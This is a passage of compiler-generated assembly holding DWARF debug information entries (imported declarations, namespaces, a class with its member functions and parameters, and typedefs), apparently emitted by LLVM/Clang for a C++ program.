# DW_AT_GNU_vector
.long 3546 # DW_AT_type
.byte 41 # Abbrev [41] 0xdd3:0x6 DW_TAG_subrange_type
.long 3516 # DW_AT_type
.byte 8 # DW_AT_count
.byte 0 # End Of Children Mark
.byte 38 # Abbrev [38] 0xdda:0x7 DW_TAG_base_type
.long .Linfo_string83 # DW_AT_name
.byte 5 # DW_AT_encoding
.byte 2 # DW_AT_byte_size
.byte 2 # Abbrev [2] 0xde1:0x8b8 DW_TAG_namespace
.long .Linfo_string85 # DW_AT_name
.byte 43 # Abbrev [43] 0xde6:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.long 5785 # DW_AT_import
.byte 43 # Abbrev [43] 0xded:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 141 # DW_AT_decl_line
.long 5886 # DW_AT_import
.byte 43 # Abbrev [43] 0xdf4:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 143 # DW_AT_decl_line
.long 5897 # DW_AT_import
.byte 43 # Abbrev [43] 0xdfb:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 144 # DW_AT_decl_line
.long 5915 # DW_AT_import
.byte 43 # Abbrev [43] 0xe02:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 145 # DW_AT_decl_line
.long 6440 # DW_AT_import
.byte 43 # Abbrev [43] 0xe09:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 146 # DW_AT_decl_line
.long 6490 # DW_AT_import
.byte 43 # Abbrev [43] 0xe10:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 147 # DW_AT_decl_line
.long 6513 # DW_AT_import
.byte 43 # Abbrev [43] 0xe17:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 148 # DW_AT_decl_line
.long 6551 # DW_AT_import
.byte 43 # Abbrev [43] 0xe1e:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 149 # DW_AT_decl_line
.long 6574 # DW_AT_import
.byte 43 # Abbrev [43] 0xe25:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 150 # DW_AT_decl_line
.long 6598 # DW_AT_import
.byte 43 # Abbrev [43] 0xe2c:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 151 # DW_AT_decl_line
.long 6626 # DW_AT_import
.byte 43 # Abbrev [43] 0xe33:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 152 # DW_AT_decl_line
.long 6644 # DW_AT_import
.byte 43 # Abbrev [43] 0xe3a:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 153 # DW_AT_decl_line
.long 6656 # DW_AT_import
.byte 43 # Abbrev [43] 0xe41:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 154 # DW_AT_decl_line
.long 6709 # DW_AT_import
.byte 43 # Abbrev [43] 0xe48:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 155 # DW_AT_decl_line
.long 6742 # DW_AT_import
.byte 43 # Abbrev [43] 0xe4f:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 156 # DW_AT_decl_line
.long 6770 # DW_AT_import
.byte 43 # Abbrev [43] 0xe56:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 157 # DW_AT_decl_line
.long 6813 # DW_AT_import
.byte 43 # Abbrev [43] 0xe5d:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 158 # DW_AT_decl_line
.long 6836 # DW_AT_import
.byte 43 # Abbrev [43] 0xe64:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 160 # DW_AT_decl_line
.long 6854 # DW_AT_import
.byte 43 # Abbrev [43] 0xe6b:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 162 # DW_AT_decl_line
.long 6883 # DW_AT_import
.byte 43 # Abbrev [43] 0xe72:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 163 # DW_AT_decl_line
.long 6911 # DW_AT_import
.byte 43 # Abbrev [43] 0xe79:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 164 # DW_AT_decl_line
.long 6934 # DW_AT_import
.byte 43 # Abbrev [43] 0xe80:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 166 # DW_AT_decl_line
.long 7015 # DW_AT_import
.byte 43 # Abbrev [43] 0xe87:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 169 # DW_AT_decl_line
.long 7047 # DW_AT_import
.byte 43 # Abbrev [43] 0xe8e:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 172 # DW_AT_decl_line
.long 7080 # DW_AT_import
.byte 43 # Abbrev [43] 0xe95:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 174 # DW_AT_decl_line
.long 7112 # DW_AT_import
.byte 43 # Abbrev [43] 0xe9c:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 176 # DW_AT_decl_line
.long 7135 # DW_AT_import
.byte 43 # Abbrev [43] 0xea3:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 178 # DW_AT_decl_line
.long 7162 # DW_AT_import
.byte 43 # Abbrev [43] 0xeaa:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 179 # DW_AT_decl_line
.long 7195 # DW_AT_import
.byte 43 # Abbrev [43] 0xeb1:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 180 # DW_AT_decl_line
.long 7217 # DW_AT_import
.byte 43 # Abbrev [43] 0xeb8:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 181 # DW_AT_decl_line
.long 7239 # DW_AT_import
.byte 43 # Abbrev [43] 0xebf:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 182 # DW_AT_decl_line
.long 7261 # DW_AT_import
.byte 43 # Abbrev [43] 0xec6:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 183 # DW_AT_decl_line
.long 7283 # DW_AT_import
.byte 43 # Abbrev [43] 0xecd:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 184 # DW_AT_decl_line
.long 7305 # DW_AT_import
.byte 43 # Abbrev [43] 0xed4:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 185 # DW_AT_decl_line
.long 7358 # DW_AT_import
.byte 43 # Abbrev [43] 0xedb:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 186 # DW_AT_decl_line
.long 7375 # DW_AT_import
.byte 43 # Abbrev [43] 0xee2:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 187 # DW_AT_decl_line
.long 7402 # DW_AT_import
.byte 43 # Abbrev [43] 0xee9:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 188 # DW_AT_decl_line
.long 7429 # DW_AT_import
.byte 43 # Abbrev [43] 0xef0:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 189 # DW_AT_decl_line
.long 7456 # DW_AT_import
.byte 43 # Abbrev [43] 0xef7:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 190 # DW_AT_decl_line
.long 7499 # DW_AT_import
.byte 43 # Abbrev [43] 0xefe:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 191 # DW_AT_decl_line
.long 7521 # DW_AT_import
.byte 43 # Abbrev [43] 0xf05:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 193 # DW_AT_decl_line
.long 7561 # DW_AT_import
.byte 43 # Abbrev [43] 0xf0c:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 195 # DW_AT_decl_line
.long 7591 # DW_AT_import
.byte 43 # Abbrev [43] 0xf13:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 196 # DW_AT_decl_line
.long 7618 # DW_AT_import
.byte 43 # Abbrev [43] 0xf1a:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 197 # DW_AT_decl_line
.long 7646 # DW_AT_import
.byte 43 # Abbrev [43] 0xf21:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 198 # DW_AT_decl_line
.long 7674 # DW_AT_import
.byte 43 # Abbrev [43] 0xf28:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 199 # DW_AT_decl_line
.long 7701 # DW_AT_import
.byte 43 # Abbrev [43] 0xf2f:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 200 # DW_AT_decl_line
.long 7719 # DW_AT_import
.byte 43 # Abbrev [43] 0xf36:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 201 # DW_AT_decl_line
.long 7747 # DW_AT_import
.byte 43 # Abbrev [43] 0xf3d:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 202 # DW_AT_decl_line
.long 7775 # DW_AT_import
.byte 43 # Abbrev [43] 0xf44:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 203 # DW_AT_decl_line
.long 7803 # DW_AT_import
.byte 43 # Abbrev [43] 0xf4b:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 204 # DW_AT_decl_line
.long 7831 # DW_AT_import
.byte 43 # Abbrev [43] 0xf52:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 205 # DW_AT_decl_line
.long 7850 # DW_AT_import
.byte 43 # Abbrev [43] 0xf59:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 206 # DW_AT_decl_line
.long 7873 # DW_AT_import
.byte 43 # Abbrev [43] 0xf60:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 207 # DW_AT_decl_line
.long 7895 # DW_AT_import
.byte 43 # Abbrev [43] 0xf67:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 208 # DW_AT_decl_line
.long 7917 # DW_AT_import
.byte 43 # Abbrev [43] 0xf6e:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 209 # DW_AT_decl_line
.long 7939 # DW_AT_import
.byte 43 # Abbrev [43] 0xf75:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 210 # DW_AT_decl_line
.long 7961 # DW_AT_import
.byte 44 # Abbrev [44] 0xf7c:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 267 # DW_AT_decl_line
.long 8141 # DW_AT_import
.byte 44 # Abbrev [44] 0xf84:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 268 # DW_AT_decl_line
.long 8171 # DW_AT_import
.byte 44 # Abbrev [44] 0xf8c:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 269 # DW_AT_decl_line
.long 8199 # DW_AT_import
.byte 44 # Abbrev [44] 0xf94:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 283 # DW_AT_decl_line
.long 7561 # DW_AT_import
.byte 44 # Abbrev [44] 0xf9c:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 286 # DW_AT_decl_line
.long 7015 # DW_AT_import
.byte 44 # Abbrev [44] 0xfa4:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 289 # DW_AT_decl_line
.long 7080 # DW_AT_import
.byte 44 # Abbrev [44] 0xfac:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 292 # DW_AT_decl_line
.long 7135 # DW_AT_import
.byte 44 # Abbrev [44] 0xfb4:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 296 # DW_AT_decl_line
.long 8141 # DW_AT_import
.byte 44 # Abbrev [44] 0xfbc:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 297 # DW_AT_decl_line
.long 8171 # DW_AT_import
.byte 44 # Abbrev [44] 0xfc4:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 298 # DW_AT_decl_line
.long 8199 # DW_AT_import
.byte 2 # Abbrev [2] 0xfcc:0x13a DW_TAG_namespace
.long .Linfo_string213 # DW_AT_name
.byte 45 # Abbrev [45] 0xfd1:0x12d DW_TAG_class_type
.byte 4 # DW_AT_calling_convention
.long .Linfo_string215 # DW_AT_name
.byte 8 # DW_AT_byte_size
.byte 16 # DW_AT_decl_file
.byte 86 # DW_AT_decl_line
.byte 46 # Abbrev [46] 0xfda:0xc DW_TAG_member
.long .Linfo_string214 # DW_AT_name
.long 6409 # DW_AT_type
.byte 16 # DW_AT_decl_file
.byte 88 # DW_AT_decl_line
.byte 0 # DW_AT_data_member_location
.byte 47 # Abbrev [47] 0xfe6:0x12 DW_TAG_subprogram
.long .Linfo_string215 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 90 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_explicit
.byte 11 # Abbrev [11] 0xfed:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0xff2:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 35 # Abbrev [35] 0xff8:0x11 DW_TAG_subprogram
.long .Linfo_string216 # DW_AT_linkage_name
.long .Linfo_string217 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 92 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 11 # Abbrev [11] 0x1003:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 35 # Abbrev [35] 0x1009:0x11 DW_TAG_subprogram
.long .Linfo_string218 # DW_AT_linkage_name
.long .Linfo_string219 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 93 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 11 # Abbrev [11] 0x1014:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 7 # Abbrev [7] 0x101a:0x15 DW_TAG_subprogram
.long .Linfo_string220 # DW_AT_linkage_name
.long .Linfo_string221 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 95 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 11 # Abbrev [11] 0x1029:0x5 DW_TAG_formal_parameter
.long 8239 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 48 # Abbrev [48] 0x102f:0xe DW_TAG_subprogram
.long .Linfo_string215 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 103 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x1037:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 48 # Abbrev [48] 0x103d:0x13 DW_TAG_subprogram
.long .Linfo_string215 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 105 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x1045:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x104a:0x5 DW_TAG_formal_parameter
.long 8249 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 48 # Abbrev [48] 0x1050:0x13 DW_TAG_subprogram
.long .Linfo_string215 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 108 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x1058:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x105d:0x5 DW_TAG_formal_parameter
.long 4358 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 48 # Abbrev [48] 0x1063:0x13 DW_TAG_subprogram
.long .Linfo_string215 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 112 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x106b:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x1070:0x5 DW_TAG_formal_parameter
.long 8259 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 49 # Abbrev [49] 0x1076:0x1b DW_TAG_subprogram
.long .Linfo_string224 # DW_AT_linkage_name
.long .Linfo_string225 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 125 # DW_AT_decl_line
.long 8264 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x1086:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x108b:0x5 DW_TAG_formal_parameter
.long 8249 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 49 # Abbrev [49] 0x1091:0x1b DW_TAG_subprogram
.long .Linfo_string226 # DW_AT_linkage_name
.long .Linfo_string225 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 129 # DW_AT_decl_line
.long 8264 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x10a1:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x10a6:0x5 DW_TAG_formal_parameter
.long 8259 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 48 # Abbrev [48] 0x10ac:0xe DW_TAG_subprogram
.long .Linfo_string227 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 136 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x10b4:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 50 # Abbrev [50] 0x10ba:0x17 DW_TAG_subprogram
.long .Linfo_string228 # DW_AT_linkage_name
.long .Linfo_string229 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 139 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x10c6:0x5 DW_TAG_formal_parameter
.long 8234 # DW_AT_type
# DW_AT_artificial
.byte 10 # Abbrev [10] 0x10cb:0x5 DW_TAG_formal_parameter
.long 8264 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 51 # Abbrev [51] 0x10d1:0x16 DW_TAG_subprogram
.long .Linfo_string230 # DW_AT_linkage_name
.long .Linfo_string231 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 151 # DW_AT_decl_line
.long 8269 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
# DW_AT_explicit
.byte 11 # Abbrev [11] 0x10e1:0x5 DW_TAG_formal_parameter
.long 8239 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 49 # Abbrev [49] 0x10e7:0x16 DW_TAG_subprogram
.long .Linfo_string233 # DW_AT_linkage_name
.long .Linfo_string234 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 172 # DW_AT_decl_line
.long 8276 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 1 # DW_AT_accessibility
# DW_ACCESS_public
.byte 11 # Abbrev [11] 0x10f7:0x5 DW_TAG_formal_parameter
.long 8239 # DW_AT_type
# DW_AT_artificial
.byte 0 # End Of Children Mark
.byte 0 # End Of Children Mark
.byte 43 # Abbrev [43] 0x10fe:0x7 DW_TAG_imported_declaration
.byte 16 # DW_AT_decl_file
.byte 80 # DW_AT_decl_line
.long 4382 # DW_AT_import
.byte 0 # End Of Children Mark
.byte 52 # Abbrev [52] 0x1106:0xc DW_TAG_typedef
.long 8254 # DW_AT_type
.long .Linfo_string223 # DW_AT_name
.byte 17 # DW_AT_decl_file
.short 284 # DW_AT_decl_line
.byte 53 # Abbrev [53] 0x1112:0x5 DW_TAG_class_type
.long .Linfo_string235 # DW_AT_name
# DW_AT_declaration
.byte 43 # Abbrev [43] 0x1117:0x7 DW_TAG_imported_declaration
.byte 16 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.long 4049 # DW_AT_import
.byte 54 # Abbrev [54] 0x111e:0x11 DW_TAG_subprogram
.long .Linfo_string236 # DW_AT_linkage_name
.long .Linfo_string237 # DW_AT_name
.byte 16 # DW_AT_decl_file
.byte 76 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_noreturn
.byte 10 # Abbrev [10] 0x1129:0x5 DW_TAG_formal_parameter
.long 4049 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 55 # Abbrev [55] 0x112f:0x5 DW_TAG_namespace
.long .Linfo_string239 # DW_AT_name
.byte 43 # Abbrev [43] 0x1134:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 47 # DW_AT_decl_line
.long 8299 # DW_AT_import
.byte 43 # Abbrev [43] 0x113b:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 48 # DW_AT_decl_line
.long 8321 # DW_AT_import
.byte 43 # Abbrev [43] 0x1142:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 49 # DW_AT_decl_line
.long 8343 # DW_AT_import
.byte 43 # Abbrev [43] 0x1149:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 50 # DW_AT_decl_line
.long 8365 # DW_AT_import
.byte 43 # Abbrev [43] 0x1150:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 52 # DW_AT_decl_line
.long 8387 # DW_AT_import
.byte 43 # Abbrev [43] 0x1157:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 53 # DW_AT_decl_line
.long 8398 # DW_AT_import
.byte 43 # Abbrev [43] 0x115e:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 54 # DW_AT_decl_line
.long 8409 # DW_AT_import
.byte 43 # Abbrev [43] 0x1165:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.long 8420 # DW_AT_import
.byte 43 # Abbrev [43] 0x116c:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 57 # DW_AT_decl_line
.long 8431 # DW_AT_import
.byte 43 # Abbrev [43] 0x1173:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.long 8453 # DW_AT_import
.byte 43 # Abbrev [43] 0x117a:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 59 # DW_AT_decl_line
.long 8475 # DW_AT_import
.byte 43 # Abbrev [43] 0x1181:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 60 # DW_AT_decl_line
.long 8497 # DW_AT_import
.byte 43 # Abbrev [43] 0x1188:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 62 # DW_AT_decl_line
.long 8519 # DW_AT_import
.byte 43 # Abbrev [43] 0x118f:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 63 # DW_AT_decl_line
.long 8541 # DW_AT_import
.byte 43 # Abbrev [43] 0x1196:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 65 # DW_AT_decl_line
.long 8552 # DW_AT_import
.byte 43 # Abbrev [43] 0x119d:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 66 # DW_AT_decl_line
.long 8581 # DW_AT_import
.byte 43 # Abbrev [43] 0x11a4:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 67 # DW_AT_decl_line
.long 3445 # DW_AT_import
.byte 43 # Abbrev [43] 0x11ab:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 68 # DW_AT_decl_line
.long 8603 # DW_AT_import
.byte 43 # Abbrev [43] 0x11b2:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 70 # DW_AT_decl_line
.long 8625 # DW_AT_import
.byte 43 # Abbrev [43] 0x11b9:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 71 # DW_AT_decl_line
.long 8636 # DW_AT_import
.byte 43 # Abbrev [43] 0x11c0:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 72 # DW_AT_decl_line
.long 8647 # DW_AT_import
.byte 43 # Abbrev [43] 0x11c7:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.long 8658 # DW_AT_import
.byte 43 # Abbrev [43] 0x11ce:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 75 # DW_AT_decl_line
.long 8669 # DW_AT_import
.byte 43 # Abbrev [43] 0x11d5:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 76 # DW_AT_decl_line
.long 8691 # DW_AT_import
.byte 43 # Abbrev [43] 0x11dc:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 77 # DW_AT_decl_line
.long 8713 # DW_AT_import
.byte 43 # Abbrev [43] 0x11e3:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 78 # DW_AT_decl_line
.long 8735 # DW_AT_import
.byte 43 # Abbrev [43] 0x11ea:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 80 # DW_AT_decl_line
.long 8757 # DW_AT_import
.byte 43 # Abbrev [43] 0x11f1:0x7 DW_TAG_imported_declaration
.byte 20 # DW_AT_decl_file
.byte 81 # DW_AT_decl_line
.long 8779 # DW_AT_import
.byte 43 # Abbrev [43] 0x11f8:0x7 DW_TAG_imported_declaration
.byte 22 # DW_AT_decl_file
.byte 53 # DW_AT_decl_line
.long 8790 # DW_AT_import
.byte 43 # Abbrev [43] 0x11ff:0x7 DW_TAG_imported_declaration
.byte 22 # DW_AT_decl_file
.byte 54 # DW_AT_decl_line
.long 8795 # DW_AT_import
.byte 43 # Abbrev [43] 0x1206:0x7 DW_TAG_imported_declaration
.byte 22 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.long 8817 # DW_AT_import
.byte 43 # Abbrev [43] 0x120d:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.long 8833 # DW_AT_import
.byte 43 # Abbrev [43] 0x1214:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 65 # DW_AT_decl_line
.long 8850 # DW_AT_import
.byte 43 # Abbrev [43] 0x121b:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 66 # DW_AT_decl_line
.long 8867 # DW_AT_import
.byte 43 # Abbrev [43] 0x1222:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 67 # DW_AT_decl_line
.long 8884 # DW_AT_import
.byte 43 # Abbrev [43] 0x1229:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 68 # DW_AT_decl_line
.long 8901 # DW_AT_import
.byte 43 # Abbrev [43] 0x1230:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 69 # DW_AT_decl_line
.long 8918 # DW_AT_import
.byte 43 # Abbrev [43] 0x1237:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 70 # DW_AT_decl_line
.long 8935 # DW_AT_import
.byte 43 # Abbrev [43] 0x123e:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 71 # DW_AT_decl_line
.long 8952 # DW_AT_import
.byte 43 # Abbrev [43] 0x1245:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 72 # DW_AT_decl_line
.long 8969 # DW_AT_import
.byte 43 # Abbrev [43] 0x124c:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.long 8986 # DW_AT_import
.byte 43 # Abbrev [43] 0x1253:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 74 # DW_AT_decl_line
.long 9003 # DW_AT_import
.byte 43 # Abbrev [43] 0x125a:0x7 DW_TAG_imported_declaration
.byte 25 # DW_AT_decl_file
.byte 75 # DW_AT_decl_line
.long 9020 # DW_AT_import
.byte 43 # Abbrev [43] 0x1261:0x7 DW_TAG_imported_declaration
